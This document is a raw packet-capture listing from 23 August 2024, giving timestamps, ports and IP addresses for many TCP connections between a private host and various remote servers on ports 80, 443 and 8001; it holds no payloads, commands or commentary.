Aug 23, 2024 18:47:19.730036974 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:19.730087996 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:19.730112076 CEST	443	51114	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:19.730124950 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:19.730159044 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:19.730498075 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:19.730521917 CEST	51114	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:19.731738091 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:19.742801905 CEST	80	49663	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:20.627298117 CEST	8001	51119	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:20.627662897 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:20.627744913 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:20.627774954 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:20.627981901 CEST	8001	51119	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:20.628046036 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:20.633145094 CEST	8001	51119	106.15.137.66	192.168.2.4
Aug 23, 2024 18:47:20.635376930 CEST	51119	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:47:20.835799932 CEST	80	49663	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:20.835860968 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:20.935643911 CEST	80	49663	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:20.939985991 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:20.947700024 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:20.947750092 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:20.947839022 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:20.948076963 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:20.948086977 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:21.486460924 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:21.486545086 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:21.508251905 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:21.508264065 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:21.508513927 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:21.508574009 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:21.509327888 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:21.556493998 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:23.666107893 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:23.666174889 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:23.666179895 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:23.666204929 CEST	443	51121	188.114.97.3	192.168.2.4
Aug 23, 2024 18:47:23.666220903 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:23.666254997 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:23.667062044 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:23.667099953 CEST	51121	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:47:25.891597033 CEST	80	49662	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:25.891710043 CEST	49662	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:25.891778946 CEST	49662	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:25.893475056 CEST	51122	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:25.906441927 CEST	80	49662	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:25.910692930 CEST	80	51122	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:25.910767078 CEST	51122	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:25.910887957 CEST	51122	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:25.922372103 CEST	80	51122	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:36.458059072 CEST	80	51122	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:36.458144903 CEST	51122	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:36.462682009 CEST	51122	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:47:36.467995882 CEST	80	51122	13.248.169.48	192.168.2.4
Aug 23, 2024 18:47:37.464427948 CEST	51124	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:37.474071026 CEST	80	51124	64.225.91.73	192.168.2.4
Aug 23, 2024 18:47:37.474147081 CEST	51124	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:37.474280119 CEST	51124	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:37.483190060 CEST	80	51124	64.225.91.73	192.168.2.4
Aug 23, 2024 18:47:37.572174072 CEST	51125	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:37.591888905 CEST	80	51125	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:37.591969967 CEST	51125	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:37.602103949 CEST	51125	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:37.610995054 CEST	80	51125	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:37.720626116 CEST	51128	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:47:37.731627941 CEST	80	51128	103.224.182.252	192.168.2.4
Aug 23, 2024 18:47:37.731688023 CEST	51128	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:47:37.731829882 CEST	51128	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:47:37.739197969 CEST	80	51128	103.224.182.252	192.168.2.4
Aug 23, 2024 18:47:38.018062115 CEST	51129	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:47:38.030106068 CEST	80	51129	103.224.212.210	192.168.2.4
Aug 23, 2024 18:47:38.030201912 CEST	51129	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:47:38.030421972 CEST	51129	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:47:38.044070959 CEST	80	51129	103.224.212.210	192.168.2.4
Aug 23, 2024 18:47:38.088521957 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:47:38.116693974 CEST	80	51130	154.85.183.50	192.168.2.4
Aug 23, 2024 18:47:38.117759943 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:47:38.147263050 CEST	80	51125	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:38.147643089 CEST	51125	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:38.150444984 CEST	80	51125	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:38.150579929 CEST	51125	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:38.168504953 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:47:38.173068047 CEST	51125	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:38.185277939 CEST	80	51124	64.225.91.73	192.168.2.4
Aug 23, 2024 18:47:38.185425997 CEST	51124	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:38.189699888 CEST	80	51130	154.85.183.50	192.168.2.4
Aug 23, 2024 18:47:38.193969965 CEST	80	51125	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:38.392822027 CEST	80	51128	103.224.182.252	192.168.2.4
Aug 23, 2024 18:47:38.393681049 CEST	51128	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:47:38.396087885 CEST	51128	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:47:38.396147966 CEST	80	51128	103.224.182.252	192.168.2.4
Aug 23, 2024 18:47:38.396692038 CEST	51128	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:47:38.407666922 CEST	80	51128	103.224.182.252	192.168.2.4
Aug 23, 2024 18:47:38.714612961 CEST	80	51129	103.224.212.210	192.168.2.4
Aug 23, 2024 18:47:38.714787006 CEST	51129	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:47:38.717088938 CEST	80	51129	103.224.212.210	192.168.2.4
Aug 23, 2024 18:47:38.717236996 CEST	51129	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:47:38.717717886 CEST	51129	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:47:38.734769106 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:38.735800982 CEST	80	51129	103.224.212.210	192.168.2.4
Aug 23, 2024 18:47:38.754403114 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:38.754611969 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:38.754611969 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:38.772331953 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.076988935 CEST	80	51130	154.85.183.50	192.168.2.4
Aug 23, 2024 18:47:39.077058077 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:47:39.078131914 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:47:39.099735975 CEST	80	51130	154.85.183.50	192.168.2.4
Aug 23, 2024 18:47:39.240201950 CEST	51132	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:47:39.256725073 CEST	80	51132	199.59.243.226	192.168.2.4
Aug 23, 2024 18:47:39.256839037 CEST	51132	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:47:39.257045031 CEST	51132	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:47:39.280673027 CEST	80	51132	199.59.243.226	192.168.2.4
Aug 23, 2024 18:47:39.439879894 CEST	80	51130	154.85.183.50	192.168.2.4
Aug 23, 2024 18:47:39.441427946 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:47:39.540278912 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.540492058 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.540507078 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.540594101 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.541769028 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.541780949 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.544677019 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.544689894 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.544742107 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.546359062 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.546371937 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.546425104 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.553246021 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.553317070 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.565778971 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.566786051 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.569359064 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.639878988 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.640218973 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.640230894 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.640280962 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.640327930 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.643202066 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.643213987 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.643996954 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.644010067 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.644068003 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.648401976 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.648413897 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.648427010 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.648499012 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.735496998 CEST	51131	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:47:39.743175983 CEST	80	51131	64.190.63.136	192.168.2.4
Aug 23, 2024 18:47:39.845093966 CEST	80	51132	199.59.243.226	192.168.2.4
Aug 23, 2024 18:47:39.847008944 CEST	80	51132	199.59.243.226	192.168.2.4
Aug 23, 2024 18:47:39.847021103 CEST	80	51132	199.59.243.226	192.168.2.4
Aug 23, 2024 18:47:39.847088099 CEST	51132	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:47:39.899787903 CEST	51132	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:47:39.899805069 CEST	51132	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:47:39.908431053 CEST	80	51132	199.59.243.226	192.168.2.4
Aug 23, 2024 18:47:39.911371946 CEST	51132	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:47:40.764436007 CEST	50749	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:40.772960901 CEST	80	50749	64.225.91.73	192.168.2.4
Aug 23, 2024 18:47:40.773031950 CEST	50749	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:40.773272038 CEST	50749	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:40.783261061 CEST	80	50749	64.225.91.73	192.168.2.4
Aug 23, 2024 18:47:40.995529890 CEST	50750	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.009201050 CEST	80	50750	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:41.009316921 CEST	50750	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.009427071 CEST	50750	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.029710054 CEST	80	50750	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:41.392220974 CEST	80	50749	64.225.91.73	192.168.2.4
Aug 23, 2024 18:47:41.392343998 CEST	50749	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:47:41.579876900 CEST	80	50750	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:41.579994917 CEST	50750	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.582654953 CEST	50750	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.595746994 CEST	50751	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.602950096 CEST	80	50750	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:41.615873098 CEST	80	50751	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:41.615955114 CEST	50751	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.617479086 CEST	50751	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:41.633008957 CEST	80	50751	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:42.175939083 CEST	80	50751	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:42.176201105 CEST	50751	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:42.285003901 CEST	50751	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:47:42.294830084 CEST	80	50751	72.52.179.174	192.168.2.4
Aug 23, 2024 18:47:46.490895033 CEST	63803	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:47:46.495929956 CEST	80	63803	52.34.198.229	192.168.2.4
Aug 23, 2024 18:47:46.496007919 CEST	63803	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:47:46.496144056 CEST	63803	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:47:46.501877069 CEST	80	63803	52.34.198.229	192.168.2.4
Aug 23, 2024 18:47:47.291793108 CEST	80	63803	52.34.198.229	192.168.2.4
Aug 23, 2024 18:47:47.291804075 CEST	80	63803	52.34.198.229	192.168.2.4
Aug 23, 2024 18:47:47.291873932 CEST	63803	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:47:47.293560028 CEST	63803	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:47:47.309576035 CEST	80	63803	52.34.198.229	192.168.2.4
Aug 23, 2024 18:47:49.431961060 CEST	63308	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:49.437616110 CEST	80	63308	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:49.437815905 CEST	63308	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:49.437999964 CEST	63308	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:49.443372965 CEST	80	63308	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:49.946039915 CEST	80	63308	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:49.946120024 CEST	63308	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:49.946836948 CEST	80	63308	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:49.946914911 CEST	63308	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:49.947489023 CEST	63308	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:49.952806950 CEST	80	63308	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.401226044 CEST	64271	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.401537895 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:51.401896000 CEST	64272	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.407704115 CEST	80	64271	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:51.407716036 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:51.407725096 CEST	80	64272	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.407773972 CEST	64271	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.407802105 CEST	64272	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.411523104 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:51.415267944 CEST	64271	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.415682077 CEST	64272	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.417608976 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:51.421932936 CEST	49732	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:51.422549009 CEST	64273	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:51.427133083 CEST	80	64271	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:51.429311037 CEST	64274	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.429315090 CEST	80	64272	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.431443930 CEST	80	49732	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:51.431452990 CEST	80	64273	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:51.431541920 CEST	64273	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:51.431920052 CEST	64273	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:51.434428930 CEST	80	64274	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.434490919 CEST	64274	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.434623957 CEST	64274	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.436779976 CEST	80	64273	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:51.440381050 CEST	80	64274	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.468729973 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:51.475946903 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:51.546242952 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:51.546324015 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:51.547452927 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:51.554260969 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:51.563524961 CEST	64275	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:51.569494963 CEST	80	64275	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:51.569556952 CEST	64275	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:51.569689989 CEST	64275	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:51.577364922 CEST	80	64275	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:51.597188950 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:51.597285986 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:51.617531061 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:51.623518944 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:51.624110937 CEST	64276	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:51.624247074 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:51.633368969 CEST	80	64276	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:51.633547068 CEST	64276	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:51.633881092 CEST	64276	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:51.634994030 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:51.636312962 CEST	64277	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:51.640769005 CEST	80	64276	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:51.643285036 CEST	80	64277	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:51.643348932 CEST	64277	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:51.643433094 CEST	64277	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:51.649967909 CEST	80	64277	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:51.662473917 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:51.662555933 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:51.818468094 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:51.818588018 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:51.839237928 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:51.839405060 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:51.862390995 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:51.862447977 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:51.862529993 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:51.864772081 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:51.864794016 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:51.929857969 CEST	80	64272	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.929871082 CEST	80	64272	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.929925919 CEST	64272	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.930788040 CEST	64272	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.936500072 CEST	80	64272	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.938406944 CEST	80	64274	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.938477039 CEST	64274	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.939090967 CEST	80	64274	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.939152002 CEST	64274	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.939177036 CEST	64274	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:51.944097042 CEST	80	64274	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:51.953160048 CEST	80	64271	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:51.953229904 CEST	64271	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.953357935 CEST	64271	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.954541922 CEST	64283	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.968322992 CEST	80	64271	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:51.969446898 CEST	80	64283	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:51.969549894 CEST	64283	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.969778061 CEST	64283	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:51.980648994 CEST	80	64283	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:52.031128883 CEST	64284	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:52.041412115 CEST	80	64284	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:52.041498899 CEST	64284	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:52.041651011 CEST	64284	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:47:52.054404020 CEST	80	64284	5.79.71.225	192.168.2.4
Aug 23, 2024 18:47:52.109009027 CEST	80	64275	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:52.109061956 CEST	64275	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:52.109134912 CEST	64275	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:52.109219074 CEST	80	64275	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:52.109272957 CEST	64275	80	192.168.2.4	69.162.80.60
Aug 23, 2024 18:47:52.115772009 CEST	80	64275	69.162.80.60	192.168.2.4
Aug 23, 2024 18:47:52.139826059 CEST	80	64276	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:52.139889956 CEST	64276	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:52.140856981 CEST	64276	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:52.141827106 CEST	80	64276	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:52.141931057 CEST	64276	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:47:52.143423080 CEST	80	64277	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:52.143521070 CEST	64277	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:52.144155979 CEST	64277	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:52.145349026 CEST	80	64277	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:52.145392895 CEST	64277	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:47:52.148051023 CEST	80	64276	18.208.156.248	192.168.2.4
Aug 23, 2024 18:47:52.151011944 CEST	80	64277	3.94.10.34	192.168.2.4
Aug 23, 2024 18:47:52.202933073 CEST	80	64273	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:52.202984095 CEST	64273	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:52.203588009 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.212668896 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.212764978 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.212944031 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.219702959 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.355370998 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.355484009 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.357650042 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.357675076 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.358047962 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.358104944 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.358570099 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.404504061 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.479171038 CEST	80	64283	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:52.479233980 CEST	64283	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:52.479324102 CEST	64283	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:47:52.485918045 CEST	80	64283	172.234.222.143	192.168.2.4
Aug 23, 2024 18:47:52.643167973 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.643227100 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.643431902 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.643444061 CEST	80	49736	199.191.50.83	192.168.2.4
